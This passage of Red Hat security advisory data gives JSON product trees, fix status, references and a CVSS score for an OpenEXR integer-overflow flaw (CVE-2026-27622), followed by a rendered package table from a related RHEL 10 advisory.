"tracking": {
"current_release_date": "2026-05-14T22:36:29+00:00",
"generator": {
"date": "2026-05-14T22:36:29+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:12341",
"initial_release_date": "2026-04-30T14:34:33+00:00",
"revision_history": [
{
"date": "2026-04-30T14:34:33+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-30T14:34:33+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:29+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product": {
"name": "Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_aus:8.4::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product": {
"name": "Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_eus_long_life:8.4::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-0:2.2.0-12.el8_4.1.src",
"product": {
"name": "OpenEXR-0:2.2.0-12.el8_4.1.src",
"product_id": "OpenEXR-0:2.2.0-12.el8_4.1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR@2.2.0-12.el8_4.1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_4.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_4.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_4.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_4.1?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_4.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_4.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_4.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_4.1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_4.1.src as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_4.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_4.1.src",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"product_id": "AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_4.1.src as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-0:2.2.0-12.el8_4.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_4.1.src",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.4.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-30T14:34:33+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.4.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:12341"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.4.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-8.4.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
RHSA-2026:7678
Vulnerability from csaf_redhat - Published: 2026-04-13 02:25 - Updated: 2026-05-14 22:36A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64 | — |
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le | — |
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x | — |
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64 | — |
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64 | — |
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le | — |
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.s390x | — |
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64 | — |
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.aarch64 | — |
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.ppc64le | — |
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.s390x | — |
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.x86_64 | — |
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64 | — |
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le | — |
Workaround
|
|
